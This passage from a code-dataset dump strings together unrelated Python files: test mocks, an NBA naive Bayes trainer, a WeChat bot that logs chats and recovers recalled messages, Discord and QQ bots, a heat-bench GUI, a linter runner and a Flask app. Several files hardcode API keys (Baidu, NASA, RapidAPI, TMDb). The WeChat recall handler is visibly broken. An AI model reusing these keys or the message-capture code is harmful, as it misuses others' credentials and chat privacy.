'asset_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'asset_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tagged_assets('my-project1', 'template1')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_search_tagged_assets_with_date_created_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 'asset_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'asset_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tagged_assets(\n 'my-project1', 'template1', '2020-01-01')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_extract_resources_from_template_should_return_values(self):\n resource_name = 'projects/my-project/locations/us-central1/tagTemplates/my-template'\n\n project_id, location_id, tag_template_id = \\\n self.__datacatalog_facade.extract_resources_from_template(resource_name)\n\n self.assertEqual('my-project', project_id)\n self.assertEqual('us-central1', location_id)\n self.assertEqual('my-template', tag_template_id)\n\n\nclass MockedObject(object):\n\n def __setitem__(self, key, value):\n self.__dict__[key] = value\n\n def __getitem__(self, key):\n return self.__dict__[key]\n\n\ndef make_fake_tag():\n tag = types.Tag()\n tag.template = 'test_template'\n tag.fields['test_bool_field'].bool_value = True\n tag.fields['test_double_field'].double_value = 1\n tag.fields['test_string_field'].string_value = 'Test String Value'\n tag.fields['test_timestamp_field'].timestamp_value.FromJsonString('2019-10-15T01:00:00-03:00')\n tag.fields['test_enum_field'].enum_value.display_name = 'Test ENUM Value'\n\n return tag\n","repo_name":"mesmacosta/datacatalog-tag-exporter","sub_path":"tests/datacatalog_tag_exporter/datacatalog_facade_test.py","file_name":"datacatalog_facade_test.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"73059782170","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nimport pandas as pd\nimport pickle\n\ndf=pd.read_csv(\"bin/7/games12:15.csv\",header=0, sep=';')\ny = df.pop('win')\ndf.pop('home_odd')\ndf.pop('visitor_odd')\nX = df\nmean = 0\nnb_repetition = 10\nfor i in range(0,nb_repetition):\n # Split dataset into training set and test set\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.02)\n #Create a Gaussian Classifier\n gnb = GaussianNB()\n\n #Train the model using the training sets\n gnb.fit(X_train, y_train)\n\n #Predict the response for test dataset\n y_pred = gnb.predict(X_test)\n pickle.dump(gnb, open('model/8/naive_bayes.model', 'wb'))\n\n print(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n mean += metrics.accuracy_score(y_test, y_pred)\nprint('mean accuracy: ', mean/nb_repetition)","repo_name":"corentinbranchereau/NBA-predictions","sub_path":"src/model_training/naive_bayes_training.py","file_name":"naive_bayes_training.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38164819450","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport itchat\nfrom itchat.content import *\nimport time\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport re\nimport json\n\nKEY = 'xxx'\n\n\ndef get_response(msg):\n apiUrl = 'http://www.tuling123.com/openapi/api'\n data = {\n 'key': KEY,\n 'info': msg,\n 'userid': 'wechat-robot',\n }\n try:\n r = requests.post(apiUrl, data=data).json()\n return r.get('text')\n except Exception as e:\n print(e)\n return\n\n\n# 文件临时存储页\nrec_tmp_dir = os.path.join(os.getcwd(), 'tmp/')\n\n# 存储数据的字典\nrec_msg_dict = {}\n\nmsg_dict = {}\n\n\ndef after_login():\n print(\"登录后调用\")\n # 获取自己的用户信息,返回自己的属性字典\n # result = itchat.search_friends(name='龙淑宁')\n # print(result)\n # print(\"========================================================\")\n # 根据姓名��找用户\n # user_info = itchat.search_friends(name='高群翔')\n # print(user_info)\n # print(\"========================================================\")\n # if len(user_info) > 0:\n # # 拿到用户名\n # user_name = user_info[0]['UserName']\n # # 发送文字信息\n # itchat.send_msg('老铁你好啊! 我是机器人哦 一起来聊天吧 ', user_name)\n # content = get_weather()\n # itchat.send_msg(content, user_name)\n # # 发送图片\n # time.sleep(10)\n # itchat.send_image('data/c3e20e1e5e2af7948b5afa3a9443a455.jpg', user_name)\n # # 发送文件\n # time.sleep(10)\n # itchat.send_file('data/1552568575305.gif', user_name)\n # 发送视频\n # time.sleep(10)\n # itchat.send_video('sport.mp4', user_name)\n # time.sleep(5)\n # itchat.send(\"文件助手你好哦\", toUserName=\"filehelper\")\n print(\"========================================================\")\n # print(\"完整的群聊列表如下:\")\n # rooms = itchat.get_chatrooms()\n # print(rooms)\n # 通过群聊名查找\n # chat_rooms = itchat.search_chatrooms(name='飘啊飘')\n # if len(chat_rooms) > 0:\n # itchat.send_msg('我是Python脚本哦,大家好啊', chat_rooms[0]['UserName'])\n # 查找特定群聊\n # time.sleep(10)\n weather_schedule()\n # start_schedule()\n\n\ndef after_logout():\n print(\"退出后调用\")\n\n\n# 好友信息监听\n@itchat.msg_register([TEXT, PICTURE, RECORDING, ATTACHMENT, VIDEO], isFriendChat=True)\ndef handle_friend_msg(msg):\n msg_id = msg['MsgId']\n msg_from_user = msg['User']['NickName']\n msg_content = ''\n # 收到信息的时间\n msg_time_rec = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n msg_create_time = msg['CreateTime']\n msg_type = msg['Type']\n\n if msg['Type'] == 'Text':\n msg_content = msg['Content']\n elif msg['Type'] == 'Picture' \\\n or msg['Type'] == 'Recording' \\\n or msg['Type'] == 'Video' \\\n or msg['Type'] == 'Attachment':\n msg_content = r\"\" + msg['FileName']\n msg['Text'](rec_tmp_dir + msg['FileName'])\n rec_msg_dict.update({\n msg_id: {\n 'msg_from_user': msg_from_user,\n 'msg_time_rec': msg_time_rec,\n 'msg_create_time': msg_create_time,\n 'msg_type': msg_type,\n 'msg_content': msg_content\n }\n })\n print(\"who:\", msg_from_user, \"createTime:\", msg_create_time, \"recvTime:\", msg_time_rec, \"content:\", msg_type,\n msg_content)\n\n\n# 群聊信息监听\n@itchat.msg_register([TEXT, PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=True)\ndef information(msg):\n msg_id = msg['MsgId']\n msg_from_user = msg['ActualNickName']\n msg_content = ''\n # 收到信息的时间\n msg_time_rec = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n msg_create_time = msg['CreateTime']\n msg_type = msg['Type']\n\n if msg['Type'] == 'Text':\n msg_content = msg['Content']\n elif msg['Type'] == 'Picture' \\\n or msg['Type'] == 'Recording' \\\n or msg['Type'] == 'Video' \\\n or msg['Type'] == 'Attachment':\n msg_content = r\"\" + msg['FileName']\n msg['Text'](rec_tmp_dir + msg['FileName'])\n rec_msg_dict.update({\n msg_id: {\n 'msg_from_user': msg_from_user,\n 'msg_time_rec': msg_time_rec,\n 'msg_create_time': msg_create_time,\n 'msg_type': msg_type,\n 'msg_content': msg_content\n }\n })\n print(\"who:\", msg_from_user, \"createTime:\", msg_create_time, \"recvTime:\", msg_time_rec, \"content:\", msg_type,\n msg_content)\n\n\n# 每隔五种分钟执行一次清理任务\ndef clear_cache():\n # 当前时间\n cur_time = time.time()\n # 遍历字典,如果有创建时间超过2分钟(120s)的记录,删除,非文本的话,连文件也删除\n for key in list(rec_msg_dict.keys()):\n if int(cur_time) - int(rec_msg_dict.get(key).get('msg_create_time')) > 600:\n if not rec_msg_dict.get(key).get('msg_type') == 'Text':\n file_path = os.path.join(rec_tmp_dir, rec_msg_dict.get(key).get('msg_content'))\n print(file_path)\n if os.path.exists(file_path):\n os.remove(file_path)\n rec_msg_dict.pop(key)\n\n\ndef weather_schedule():\n user_info = itchat.search_friends(name='龙淑宁')\n if len(user_info) > 0:\n # 拿到用户名\n user_name = user_info[0]['UserName']\n print(\"用户名:\", user_name)\n content = get_weather()\n itchat.send_msg(content, user_name)\n\n\n# 开始轮询任务\ndef start_schedule():\n scheduler = BackgroundScheduler()\n scheduler.add_job(clear_cache, 'interval', minutes=20)\n scheduler.add_job(weather_schedule, 'interval', hours=24)\n scheduler.start()\n try:\n # 其他任务是独立的线程执行\n while True:\n time.sleep(2)\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n print('Exit The Job!')\n\n\n@itchat.msg_register([NOTE])\ndef send_msg_helper(msg):\n print('收到一条提醒', msg)\n # 正则表达式搜索消息内容\n search_res = re.search(\"(.*?)\", msg['Content']).group(1)\n old_msg = msg_dict.get(revoke_msg_id, {})\n # 小于11就是非文本消息\n if len(revoke_msg_id) < 11:\n pass\n else:\n msg_body = old_msg.get('msg_from')\n if isinstance(msg_body, str):\n msg_body += ' 撤回了一个文本消息'\n msg_body += old_msg.get('msg_time_rec')\n msg_body += \"内容是[\"\n msg_body += old_msg.get('msg_content')\n msg_body += \"]\"\n # 将撤回消息发送到文件助手\n itchat.send(msg_body, toUserName='filehelper')\n # 删除字典旧消息\n msg_dict.pop(revoke_msg_id)\n else:\n print(\"非文本消息\")\n else:\n print('不是撤回')\n\n\n# 图灵机器人数据接口\n@itchat.msg_register(itchat.content.TEXT)\ndef tuling_reply(msg):\n info = msg['Content'].encode('utf8')\n print(\"收到一条信息:\", msg.text)\n # 图灵API接口\n api_url = 'http://openapi.tuling123.com/openapi/api/v2'\n # 接口请求数据\n data = {\n \"reqType\": 0,\n \"perception\": {\n \"inputText\": {\n \"text\": str(info)\n }\n },\n \"userInfo\": {\n \"apiKey\": KEY,\n \"userId\": \"ctj\"\n }\n }\n headers = {\n 'Content-Type': 'application/json',\n 'Host': 'openapi.tuling123.com',\n 'User-Agent': 'Mozilla/5.0 (Wi`ndows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3486.0 '\n 'Safari/537.36 '\n }\n # 请求接口\n result = requests.post(api_url, headers=headers, json=data).json()\n # 提取text,发送给发信息的人\n reply_text = result['results'][0]['values']['text']\n print(\"图灵机器人回复:\", reply_text)\n itchat.send_msg(reply_text, msg['FromUserName'])\n\n\ndef get_weather():\n city_sum = ['北京', '长沙', '茶陵']\n content = '嗨,小猪猪为你播报\\n'\n for i in city_sum:\n url = 'http://api.map.baidu.com/telematics/v3/weather?' \\\n 'location=%s&output=json&ak=TueGDhCvwI6fOrQnLM0qmXxY9N0OkOiQ&callback=?' % i\n content = content + get_weather_content(url)\n return content\n\n\ndef get_weather_content(url):\n # 使用requests发起请求,接受返回的结果\n rs = requests.get(url)\n # 使用loads函数,将json字符串转换为python的字典或列表\n rs_dict = json.loads(rs.text)\n # 取出error\n error_code = rs_dict['error']\n # 如果取出的error为0,表示数据正常,否则没有查询到结果\n if error_code == 0:\n # 从字典中取出数据\n # 根据索引取出天气信息字典\n info_dict = rs_dict['results'][0]\n # 根据字典的key,取出城市名称\n city_name = info_dict['currentCity']\n # 取出pm值\n pm25 = info_dict['pm25']\n # 取出天气信息列表\n weather_data = info_dict['weather_data'][0:2]\n # for循环取出每一天天气的小字典\n content = '当前%s\\n' % city_name\n for weather_dict in weather_data:\n # 取出日期,天气,风级,温度\n date = weather_dict['date']\n weather = weather_dict['weather']\n wind = weather_dict['wind']\n temperature = weather_dict['temperature']\n content = content + '日期:%s\\t天气:%s\\t风级:%s\\t温度:%s\\tpm值:%s\\n' % \\\n (date, weather, wind, temperature, pm25)\n return content\n\n\nif __name__ == '__main__':\n if not os.path.exists(rec_tmp_dir):\n os.mkdir(rec_tmp_dir)\n itchat.auto_login(hotReload=True, enableCmdQR=2, loginCallback=after_login, exitCallback=after_logout)\n itchat.run()\n itchat.login()\n","repo_name":"tanjunchen/spider-project","sub_path":"wechartrobot/roboot.py","file_name":"roboot.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"38037687535","text":"import json\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\nfrom discord_slash import SlashCommand\n\n\ndef run_bot(*cogs: Cog, override_token=None):\n if override_token is not None:\n token = override_token\n else:\n with open(\"secret.json\", \"r\") as f:\n sec = json.loads(f.read())\n token = sec['token']\n\n intents = discord.Intents.all()\n bot = commands.Bot(command_prefix='?', description=\"\", intents=intents)\n activity = discord.Activity(type=discord.ActivityType.watching, name=\"the server ⏳\")\n slash = SlashCommand(bot, sync_commands=True)\n for cog in cogs:\n bot.add_cog(cog)\n\n bot.run(token)\n","repo_name":"richardwzp/sandman_v2","sub_path":"bot_runner.py","file_name":"bot_runner.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7046794715","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : t26 \nDate : 8/9/2021\nPurpose: Review tuples\n\"\"\"\n\nimport argparse\n\ndef minmax(items):\n \"\"\"\n Return the maximum and minimum of the collection\n :param items: collection of objects\n :return: min and max\n \"\"\"\n return min(items), max(items)\n\n\ndef main():\n \"\"\"Make your noise here\"\"\"\n # A tuple of any kind of object\n t = (\"Ogden\", 1.99, 2)\n print(f'Tuple is {len(t)} items long')\n print(t[0])\n print(t[1])\n for item in t:\n print(type(item))\n\n a = ((1, 2), (10, 20), (100, 200), \"yo yo\")\n for itemFirst in a:\n print('---')\n for itemSecond in itemFirst:\n print(itemSecond)\n\n minmax(items)\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n # main()\n items = (3, 88, 11, 22, 33)\n lower, upper = minmax(items)\n print(f'minimum {lower} and maximum {upper}')\n # Test for memebership: in, not in\n if 3 in items:\n print(\"I have a 3\")","repo_name":"solidtony/python_hafb","sub_path":"Day1/mytuples.py","file_name":"mytuples.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38313824108","text":"\"\"\" HeatBench GUI class definition \"\"\"\n\nimport os\nfrom tkinter import *\nfrom tkinter import ttk\nfrom queue import Queue\nfrom hb_graph import Graph\nfrom hb_thread import Thread_hb\nfrom hb_process import Process\nfrom hb_enum import *\n\n\n\n\"\"\" Class definition \"\"\"\nclass Gui(object):\n\tdef __init__(self):\n\t\t# Initialize thread driven by GUI and Q for thread->GUI communication\n\t\tself._thread_meas = None\n\t\tself._queue = Queue(maxsize=10)\n\t\tself._samp_period = 0.5\n\t\tself._temp_pain = 35\n\t\tself._temp_burn = 50\n\t\tself._sensor_dir = \"/home/pi/heatbench/sensors\"\n\t\tself._log_dir = \"/home/pi/heatbench/data\"\n\n\t\t# Create master window\n\t\tself._win = Tk()\n\t\tself._win.title('Heat Bench')\n\t\tself._win.geometry(\"1400x640\")\n\n\t\t# Create slave items\n\t\tself._label_sensor = Label(self._win, text='Sensor selection', foreground='blue')\n\t\tself._label_sensor.place(x=20, y=80)\n\n\t\tself._list_sensor = ttk.Combobox(self._win, values=self._get_sensor_list(), height=4, width=35)\n\t\tself._list_sensor.place(x=20, y=100)\n\t\tself._list_sensor.current(0)\n\n\t\tself._num_ref = Label(self._win, text='Ref = - deg', foreground='green')\n\t\tself._num_ref.place(x=20, y=150)\n\n\t\tself._num_sensor = Label(self._win, text='Sensor = - deg', foreground='blue')\n\t\tself._num_sensor.place(x=20, y=180)\n\n\t\tself._num_lim = Label(self._win, text='Pain threshold = {0} deg'.format(self._temp_pain), foreground='yellow')\n\t\tself._num_lim.place(x=20, y=210)\n\n\t\tself._num_lim = Label(self._win, text='Burn threshold = {0} deg'.format(self._temp_burn), foreground='red')\n\t\tself._num_lim.place(x=20, y=240)\n\n\t\tself._butt_start = Button(self._win, text='START', foreground='green', height=4, width=30, command=self._start_process)\n\t\tself._butt_start.place(x=20, y=350)\n\n\t\tself._butt_stop = Button(self._win, text='STOP', foreground='red', height=4, width=30, command=self._stop_process)\n\t\tself._butt_stop.place(x=20, y=450)\n\t\tself._butt_stop[\"state\"] = 'disable'\n\n\t\tself._info_state = Label(self._win, text='')\n\t\tself._info_state.place(x=20, y=550)\n\n\t\tself._graph = Graph(self._win, h=600, w=1000)\n\t\tself._graph.place(x=380, y=20)\n\n\t\t# Run graph update function\n\t\tself._graph.animate(int(1000 * self._samp_period))\n\n\t\t# Run GUI update function\n\t\tself._win.after(1000, self._update_gui)\n\n\t\t# Run event handler\n\t\tself._win.mainloop()\n\n\tdef _start_process(self):\n\t\tself._graph.clear()\n\t\tself._thread_meas = Thread_hb( Process( self._queue, self._samp_period, self._sensor_dir, self._list_sensor.get(), self._log_dir ) )\n\t\tself._thread_meas.start()\n\t\tself._list_sensor[\"state\"] = 'disable'\n\t\tself._butt_start[\"state\"] = 'disable'\n\t\tself._butt_stop[\"state\"] = 'normal'\n\n\tdef _stop_process(self):\n\t\tself._action_stop()\n\n\tdef _update_gui(self):\n\t\twhile not self._queue.empty():\n\t\t\titem = self._queue.get()\n\t\t\tif item[Msg.ID] == Id.INFO:\n\t\t\t\tself._info_state[\"text\"] = item[Msg.DATA]\n\t\t\telif item[Msg.ID] == Id.TEMP:\n\t\t\t\tself._num_ref[\"text\"] = 'Ref = %.1f deg' % item[Msg.DATA][Temp.REF]\n\t\t\t\tself._num_sensor[\"text\"] = 'Sensor = %.1f deg' % item[Msg.DATA][Temp.SENSOR]\n\t\t\t\tself._graph.add_point(item[Msg.DATA], self._temp_pain, self._temp_burn)\n\t\t\telse: # Error\n\t\t\t\tself._action_stop()\n\t\tself._win.after(100, self._update_gui)\n\n\tdef _action_stop(self):\n\t\tself._thread_meas.join()\n\t\tself._thread_meas = None\n\t\tself._list_sensor[\"state\"] = 'normal'\n\t\tself._butt_start[\"state\"] = 'normal'\n\t\tself._butt_stop[\"state\"] = 'disable'\n\n\tdef _get_sensor_list(self):\n\t\tsensor_list = []\n\t\tfor file in [ f for f in os.listdir(self._sensor_dir) if os.path.isfile(os.path.join(self._sensor_dir, f)) and f.endswith('.txt') ]:\n\t\t\tsensor_list.append(file.replace('.txt', ''))\n\t\tsensor_list.sort()\n\t\treturn sensor_list\n\n\n\n","repo_name":"JulienP31/temperature_logger","sub_path":"heatbench/hb_gui.py","file_name":"hb_gui.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25796032850","text":"\"\"\"Run linters on files and directories and sort results.\n\nUsage:\n yala ...\n yala --dump-config\n yala --version\n yala -h | --help\n\nOptions:\n --dump-config Show all detected configurations\n --version Show yala and linters' versions.\n -h --help Show this help.\n\n\"\"\"\nimport logging\nimport shlex\nimport subprocess\nimport sys\nfrom itertools import chain\nfrom multiprocessing import Pool\nfrom typing import List\n\nfrom docopt import docopt\n\nfrom . import __version__\nfrom .config import Config\nfrom .linters import LINTERS\n\nLOG = logging.getLogger(__name__)\n\n\nclass LinterRunner:\n \"\"\"Run linter and process results.\"\"\"\n\n config = None\n targets: List[str] = []\n\n def __init__(self, linter_class):\n \"\"\"Set linter class and its configuration.\"\"\"\n linter_class.config = self.config.get_linter_config(linter_class.name)\n self._linter = linter_class()\n\n @classmethod\n def run(cls, linter_cfg_tgts):\n \"\"\"Run a linter and return the results.\"\"\"\n linter_class, cls.config, cls.targets = linter_cfg_tgts\n runner = cls(linter_class)\n return runner.get_results()\n\n def get_results(self):\n \"\"\"Run the linter, parse, and return result list.\n\n If a linter specified by the user is not found, return an error message\n as result.\n \"\"\"\n try:\n stdout, stderr = self._lint()\n # Can't return a generator from a subprocess\n return list(stdout), self._format_stderr(stderr)\n except FileNotFoundError as exception:\n # Error if the linter was not found but was chosen by the user\n if self._linter.name in self.config.user_linters:\n error_msg = (\n f\"Could not find {self._linter.name}. \"\n f\"Did you install it? Got exception: {exception}\"\n )\n return [], [error_msg]\n # If the linter was not chosen by the user, do nothing\n return [], []\n\n def _get_command(self):\n \"\"\"Return command with options and targets, ready for execution.\"\"\"\n targets = \" \".join(self.targets)\n cmd_str = self._linter.command_with_options + \" \" + targets\n cmd_shlex = shlex.split(cmd_str)\n return list(cmd_shlex)\n\n def _lint(self):\n \"\"\"Run linter in a subprocess.\"\"\"\n command = self._get_command()\n process = subprocess.run( # nosec\n command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=False,\n )\n LOG.info(\"Finished %s\", self._linter.name)\n stdout, stderr = self._get_output_lines(process)\n return self._linter.parse(stdout, stderr)\n\n @staticmethod\n def _get_output_lines(process):\n return [\n (line for line in output.decode(\"utf-8\").splitlines() if line)\n for output in (process.stdout, process.stderr)\n ]\n\n def _format_stderr(self, lines):\n return [f\"[{self._linter.name}] {line}\" for line in lines]\n\n\nclass Main:\n \"\"\"Parse all linters and aggregate results.\"\"\"\n\n # We only need the ``run`` method.\n\n def __init__(self, config=None, all_linters=None):\n \"\"\"Initialize the only Config object and assign it to other classes.\n\n Args:\n config (Config): Config object.\n all_linters (dict): Names and classes of all available linters.\n\n \"\"\"\n self._classes = all_linters or LINTERS\n self._config = config or Config(self._classes)\n LinterRunner.config = self._config\n\n def lint(self, targets):\n \"\"\"Run linters in parallel and sort all results.\n\n Args:\n targets (list): List of files and folders to lint.\n\n \"\"\"\n LinterRunner.targets = targets\n linters = self._config.get_linter_classes()\n with Pool() as pool:\n linter_cfg_tgts = (\n (linter, self._config, targets)\n for linter in linters\n ) # fmt: skip\n linters_out_err = pool.map(LinterRunner.run, linter_cfg_tgts)\n stdouts, stderrs = zip(*linters_out_err)\n return (sorted(chain.from_iterable(stdouts)),\n chain.from_iterable(stderrs)) # fmt: skip\n\n def run_from_cli(self, args):\n \"\"\"Read arguments, run and print results.\n\n Args:\n args (dict): Arguments parsed by docopt.\n\n \"\"\"\n if args[\"--dump-config\"]:\n self._config.print_config()\n else:\n stdout, stderr = self.lint(args[\"\"])\n self.print_results(stdout, stderr)\n\n @classmethod\n def print_results(cls, stdout, stderr):\n \"\"\"Print linter results and exits with an error if there's any.\"\"\"\n for line in stderr:\n print(line, file=sys.stderr)\n if stdout:\n if stderr: # blank line to separate stdout from stderr\n print(file=sys.stderr)\n cls._print_stdout(stdout)\n else:\n print(\":) No issues found.\")\n\n @staticmethod\n def _print_stdout(stdout):\n for line in stdout:\n print(line)\n issue = \"issues\" if len(stdout) > 1 else \"issue\"\n sys.exit(f\"\\n:( {len(stdout)} {issue} found.\")\n\n\ndef main():\n \"\"\"Entry point for the console script.\"\"\"\n args = docopt(__doc__, version=__version__)\n Main().run_from_cli(args)\n","repo_name":"cemsbr/yala","sub_path":"yala/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"73409996890","text":"from .api import *\nfrom .school_rank import *\n\njx3_cmd_top100_ = on_command(\"jx3_top100\", aliases={\"百强\"}, priority=5)\n\n@jx3_cmd_top100_.handle()\nasync def jx3_top100(event: GroupMessageEvent, args: Message = CommandArg()):\n '''\n 获取魔盒百强列表:\n\n Example:-百强 幽月轮 李重茂\n Example:-百强 幽月轮 李重茂 风波渡\n '''\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2, 3]:\n return await jx3_cmd_top100_.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n server = None\n boss = arg[0]\n team = None\n elif len(arg) == 2:\n s = server_mapping(arg[0])\n if s:\n server = s\n boss = arg[1]\n team = None\n else:\n server = None\n boss = arg[0]\n team = arg[1]\n else:\n server = server_mapping(arg[0])\n boss = arg[1]\n team = arg[2]\n data = await get_top100(server, boss, team)\n return await jx3_cmd_top100_.finish(data)\n\njx3_cmd_rank = on_command(\"jx3_rank\", aliases={\"榜单\"}, priority=5)\n\n@jx3_cmd_rank.handle()\nasync def jx3_rank(event: GroupMessageEvent, args: Message = CommandArg()):\n '''\n 获取风云榜单:\n\n Example:-榜单 个人 幽月轮 名士五十强\n Example:-榜单 帮会 幽月轮 恶人神兵宝甲五十强\n Example:-榜单 阵营 幽月轮 赛季恶人五十强\n Example:-榜单 试炼 幽月轮 明教\n '''\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [2, 3]:\n return await jx3_cmd_rank.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 2:\n type1 = arg[0]\n server = None\n type2 = arg[1]\n else:\n type1 = arg[0]\n server = arg[1]\n type2 = arg[2]\n data = await rank_(type_1=type1, server=server, type_2=type2, group_id=event.group_id)\n if type(data) == type([]):\n return await jx3_cmd_rank.finish(data[0])\n else:\n return await jx3_cmd_rank.finish(ms.image(data))\n\njx3_cmd_zlrank = on_command(\"jx3_zlrank\", aliases={\"资历排行\"}, priority=5)\n\n@jx3_cmd_zlrank.handle()\nasync def jx3_zlrank(event: GroupMessageEvent, args: Message = CommandArg()):\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n return await jx3_cmd_zlrank.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n server = None\n school = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n school = arg[1]\n data = await zlrank(server, school, str(event.group_id))\n if type(data) == type([]):\n return await jx3_cmd_zlrank.finish(data[0])\n else:\n return await jx3_cmd_zlrank.finish(ms.image(Path(data).as_uri()))\n\nrank = on_command(\"jx3_schoolrank\", aliases={\"门派天梯\",\"天梯\"}, priority=5)\n\n@rank.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n season = args.extract_plain_text()\n season_data = await get_api(\"https://cms.jx3box.com/api/cms/bps/dps/group?client=std\")\n if season == \"\":\n season_key = season_data[\"data\"][0][\"key\"]\n else:\n flag = False\n for i in season_data[\"data\"]:\n if i[\"label\"] == season:\n season_key = i[\"key\"]\n flag = True\n if flag == False:\n await rank.finish(\"唔……您所提供的赛季暂时无法找到,您可以留空,这样音卡将提供最新赛季的天梯榜。\")\n else:\n img = await get_school_rank(season_key)\n await rank.finish(ms.image(img))\n img = await get_school_rank(season_key)\n await rank.finish(ms.image(img))","repo_name":"codethink-cn/Inkar-Suki","sub_path":"src/plugins/jx3/rank/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"2342140554","text":"from flask import Flask,render_template,request\r\n\r\nimport requests\r\nfrom urllib.request import urlretrieve\r\nfrom pprint import PrettyPrinter\r\nimport random\r\nfrom tmdbv3api import TMDb\r\nfrom tmdbv3api import Movie\r\n\r\n\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/')\r\n\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/nasa')\r\n\r\n\r\n\r\ndef nasa():\r\n\r\n url = 'https://api.nasa.gov/planetary/apod?api_key='\r\n api_key = 'bfkOSaZmSPBZwMqpcksD249bczLgM3OyikzpNYSl'\r\n\r\n \r\n pp=PrettyPrinter()\r\n URL_APOD = \"https://api.nasa.gov/planetary/apod\"\r\n\r\n try:\r\n response = requests.get(f\"{url}{api_key}\").json()\r\n pp.pprint(response)\r\n img_url=response['url']\r\n img_title=response['title']\r\n img_exp=response['explanation']\r\n print(img_exp)\r\n res= {'i_url':img_url,'i_tit':img_title,'i_exp':img_exp}\r\n # print(res.i_exp)\r\n\r\n return render_template('nasa.html',res=res)\r\n except Exception as e:\r\n print()\r\n res= {'i_url':\"\",'i_tit':\"network issue\",'i_exp':\" network issue\"}\r\n return render_template('nasa.html',res=res)\r\n\r\n@app.route('/more',methods =[\"GET\", \"POST\"])\r\n\r\n\r\n\r\n\r\ndef more():\r\n \r\n chance=random.randint(0, 1)\r\n \r\n if request.method != \"GET\":\r\n \r\n \r\n \r\n n1 = request.form.get(\"fname\")\r\n \r\n n2 = request.form.get(\"lname\") \r\n\r\n url = \"https://love-calculator.p.rapidapi.com/getPercentage\"\r\n querystring = {\"sname\":n1,\"fname\":n2}\r\n headers = {\r\n \"X-RapidAPI-Host\": \"love-calculator.p.rapidapi.com\",\r\n \"X-RapidAPI-Key\": \"0de338cd14msh8af713bea17cde5p17b676jsn77fbba8c1def\"\r\n }\r\n response = requests.request(\"GET\", url, headers=headers, params=querystring).json()\r\n print(response)\r\n n1=response['fname']\r\n n2=response['sname']\r\n n3=response['percentage']\r\n print(n1,n2,n3)\r\n\r\n res={'x':n1,'y':n2,'z':n3, 'n' :chance}\r\n\r\n\r\n return render_template('more.html',res=res)\r\n \r\n # response={\"fname\":\"-------\",\"sname\":\"--------\",\"percentage\":\"%\",\"result\":\"-------\"} \r\n res={'x':\"-\",'y':\"-\",'z':\"-\",'n' :2} \r\n return render_template('more.html',res=res)\r\n\r\n\r\n@app.route('/movies')\r\n\r\ndef movies():\r\n\r\n\r\n\r\n\r\n return render_template('movies.html')\r\n\r\n\r\n@app.route('/movie-info/')\r\n\r\ndef calll(Number):\r\n id=int(Number)\r\n\r\n \r\n try:\r\n tmdb = TMDb()\r\n\r\n tmdb.api_key = 'af5f6a137e02c292119db472e96cca2b'\r\n tmdb.language = 'en'\r\n tmdb.debug = True\r\n\r\n movie = Movie()\r\n m = movie.details(Number)\r\n\r\n \r\n 